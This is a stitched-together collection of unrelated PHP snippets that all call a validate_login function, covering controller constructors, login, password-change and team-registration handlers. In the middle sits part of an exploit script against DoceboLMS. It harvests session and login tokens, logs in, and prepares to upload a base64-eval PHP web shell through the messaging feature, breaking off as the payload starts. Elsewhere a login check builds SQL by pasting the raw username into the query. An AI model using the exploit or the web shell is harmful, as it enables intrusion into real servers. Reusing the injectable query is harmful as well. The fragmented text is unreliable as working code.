public function __construct()
{
parent::__construct();
$this->load->helper(array('form', 'date'));
$this->load->model('Job_m');
validate_login();
}
public function __construct()
{
parent::__construct();
$this->load->helper('job');
$this->load->helper('form');
validate_login();
}
function __construct()
{
parent::__construct();
$this->load->model('Ingreso_model');
$this->load->model('Roles_model');
$this->data["usu_id"] = $this->session->userdata('usu_id');
validate_login($this->data["usu_id"]);
}
public function __construct()
{
parent::__construct();
//validate login
validate_login();
//redirect to login if not admin
// if(!is_admin())
// redirect('auth/login', 'refresh');
}
function login_check_user_pass($user, $pass, $token)
{
global $db;
if ($db->QuerySingleValue0("SELECT id FROM users_sys where nom = '{$user}' and pass='******'") != 0) {
if (validate_login($user, $pass, $token)) {
return true;
}
} else {
// Error LOgin ==> update CRC
$updat_ctc = "update users_sys set ctc=ctc+1 where nom='{$user}'";
if (!$db->Query($updat_ctc)) {
$db->Kill('Erreur Update CTC');
}
return false;
}
}
public function __construct()
{
// creación dinámica del menú
parent::__construct();
header('Pragma: no-cache');
$this->load->database();
$this->load->model('Ingreso_model');
$this->load->helper('miscellaneous');
$this->load->helper('security');
$this->load->library('tcpdf/tcpdf.php');
$this->load->library('layout', 'layout_main');
$this->data['user'] = $this->session->userdata();
$this->data["usu_id"] = $this->session->userdata('usu_id');
validate_login($this->data['user']['usu_id']);
// $this->verificacion();
}
function validate_user(&$user)
{
if (isset($_POST['submit_registration']) && validate_registration($user)) {
return true;
// Successful registration
} else {
if (isset($_POST['submit_login']) && validate_login($user)) {
return true;
// Successful login
} else {
if ($user->id > 0) {
return true;
// Already logged in
} else {
return false;
// Request credentials
}
}
}
}
public function __construct()
{
parent::__construct();
validate_login();
}
$packet = "GET " . $p . "index.php HTTP/1.1\r\n";
$packet .= "host: " . $host . "\r\n\r\n";
sendpacket($packet);
$session = get_session($html);
$token = get_token($html);
echo "(+) Grabbing session: " . $session . "\n";
echo "(+) Grabbing login token: " . $token . "\n";
// login
$data = "authentic_request=" . $token . "&login_userid=" . $user . "&login_pwd=" . $pswd . "&log_button=Login";
$login_pkt = "POST " . $p . "doceboLms/index.php?modname=login&op=confirm HTTP/1.1\r\n";
$login_pkt .= "Host: " . $host . "\r\n";
$login_pkt .= "Cookie: " . $session . "\r\n";
$login_pkt .= "Content-Type: application/x-www-form-urlencoded\r\n";
$login_pkt .= "Content-Length: " . strlen($data) . "\r\n\r\n" . $data;
sendpacket($login_pkt);
if (validate_login($html)) {
echo "(+) Logged into the application..\n";
} else {
die("(-) Login failed!\n");
}
$session = get_session($html);
echo "(+) Grabbing Logged in session: " . $session . "\n";
// now for the upload
$packet = "GET " . $p . "doceboLms/index.php?modname=message&op=addmessage&from=out HTTP/1.1\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Cookie: " . $session . "\r\n\r\n";
sendpacket($packet);
$token = get_token($html);
echo "(+) Grabbing upload token: " . $token . "\n";
$php_code = "<?php error_reporting(0); eval(base64_decode(\$_SERVER[HTTP_HAX])) ?>";
$payload = "--o0oOo0o\r\n";
<?php
require_once 'libcollection.php';
if (isset($_POST['username']) && isset($_POST['password'])) {
startSession();
$pass = $_POST['password'];
$usr = $_POST['username'];
if (validate_login($usr, $pass)) {
$_SESSION['username'] = $usr;
header('Location: home.php');
}
}
if (!isset($_SESSION['username'])) {
$_SESSION['password'] = $pass;
$_SESSION['username'] = $usr;
header('Location: index.php');
}
function get_user_info($user_id = false)
{
if ($user_id) {
$uid = $user_id;
} else {
$uid = validate_login();
}
$ci =& get_instance();
$ci->load->model('user');
$user_data = $ci->user->get_user_info($uid);
return $user_data;
}
public function logout()
{
$this->load->helper('cookie');
$this->session->sess_destroy();
delete_cookie('logined');
if (validate_login()) {
redirect('user/login');
}
}
<?php
if (isset($_POST["change"])) {
// Try to change the password
if (validate_login($_SESSION["username"], $_POST["oldpassword"])) {
if (changePassword($_SESSION["username"], $_POST['password'], $_POST['password2'])) {
echo "Your password has been changed.<br />\n\t\t\t\t<a href='./index.php'>Return to homepage</a>";
} else {
echo "Password change failed! Please try again.";
// Show the change password form
require "include/changepasswordform.php";
}
} else {
echo "Password change failed! Please try again.";
// Show the change password form
require "include/changepasswordform.php";
}
} else {
// Show the change password form
require "include/changepasswordform.php";
}
function handle_team_registration($bid, $pin, $extra_args = array())
{
$team_registration = sanitized_team_registration();
$user = get_user($bid);
$tid = $user["tid"];
$team = get_team($tid);
$team_members = get_team_members($tid);
// Choose appropriate action to perform.
if (strcmp($team_registration["teamRegistrationAction"], "remove") == 0) {
$userToRemove = get_user($team_registration["teamRegistrationBid"]);
if ($userToRemove != null && $userToRemove["tid"] == $tid) {
assign_user_to_team($userToRemove["bid"], PASSPORT_NO_TEAM_TID);
log_entry(LOG_MODE_USER, LOG_USER_ACTION_REMOVE_TEAM_MEMBER, array("actorUid" => $user["uid"], "actorBid" => $user["bid"], "targetUid" => $user_to_add["uid"], "targetBid" => $user_to_add["bid"], "targetTid" => PASSPORT_NO_TEAM_TID, comment => addslashes(serialize($team_registration))));
$team = get_team($tid);
$team_members = get_team_members($tid);
return array("view" => "team_registration_add", "args" => array("bid" => $bid, "pin" => $pin, "teamMemberJustRemoved" => $user_to_remove, "teamMembers" => $team_members, "team" => $team) + $extra_args);
}
} else {
if (strcmp($team_registration["teamRegistrationAction"], "create") == 0) {
if (valid_team_name($team_registration["teamName"])) {
$tid = register_team($team_registration["teamName"], $user["uid"]);
log_entry(LOG_MODE_USER, LOG_USER_ACTION_CREATE_TEAM, array("actorUid" => $user["uid"], "actorBid" => $user["bid"], "targetTid" => $tid, comment => addslashes(serialize($team_registration))));
if ($tid == PASSPORT_NO_TEAM_TID) {
return array("view" => "team_registration_create", "args" => array("bid" => $bid, "pin" => $pin) + $extra_args);
}
assign_user_to_team($bid, $tid);
log_entry(LOG_MODE_USER, LOG_USER_ACTION_ADD_TEAM_MEMBER, array("actorUid" => $user["uid"], "actorBid" => $user["bid"], "targetUid" => $user["uid"], "targetBid" => $user["bid"], "targetTid" => $tid, comment => addslashes(serialize($team_registration))));
$team_members = get_team_members($tid);
$team = get_team($tid);
return array("view" => "team_registration_add", "args" => array("bid" => $bid, "pin" => $pin, "teamJustCreated" => true, "teamMembers" => $team_members, "team" => $team) + $extra_args);
} else {
return array("view" => "team_registration_create", "args" => array("bid" => $bid, "pin" => $pin, "teamNameInvalid" => true) + $extra_args);
}
} else {
if (strcmp($team_registration["teamRegistrationAction"], "add") == 0) {
$user = get_user($bid);
$team = get_team($user["tid"]);
$team_members = get_team_members($user["tid"]);
if (count($team_members) < MAX_TEAM_MEMBERS) {
if (validate_login($team_registration["teamRegistrationBid"], $team_registration["teamRegistrationPin"])) {
$user_to_add = get_user($team_registration["teamRegistrationBid"]);
if ($user_to_add["tid"] == PASSPORT_NO_TEAM_TID) {
assign_user_to_team($user_to_add["bid"], $tid);
log_entry(LOG_MODE_USER, LOG_USER_ACTION_ADD_TEAM_MEMBER, array("actorUid" => $user["uid"], "actorBid" => $user["bid"], "targetUid" => $user_to_add["uid"], "targetBid" => $user_to_add["bid"], "targetTid" => $tid, comment => addslashes(serialize($team_registration))));
$team_members = get_team_members($user["tid"]);
return array("view" => "team_registration_add", "args" => array("bid" => $bid, "pin" => $pin, "teamMemberJustAdded" => $user_to_add, "teamMembers" => $team_members, "team" => $team) + $extra_args);
} else {
return array("view" => "team_registration_add", "args" => array("bid" => $bid, "pin" => $pin, "alreadyOnTeam" => true, "teamMembers" => $team_members, "team" => $team) + $extra_args);
}
} else {
return array("view" => "team_registration_add", "args" => array("bid" => $bid, "pin" => $pin, "teamMemberBad" => true, "teamMembers" => $team_members, "team" => $team) + $extra_args);
}
} else {
return array("view" => "team_registration_add", "args" => array("bid" => $bid, "pin" => $pin, "teamFull" => true, "teamMembers" => $team_members, "team" => $team) + $extra_args);
}
}
}
}
// No action specified, just need to show the user the current members.
return array("view" => "team_registration_add", "args" => array("bid" => $bid, "pin" => $pin, "teamMembers" => $team_members, "team" => $team) + $extra_args);
}
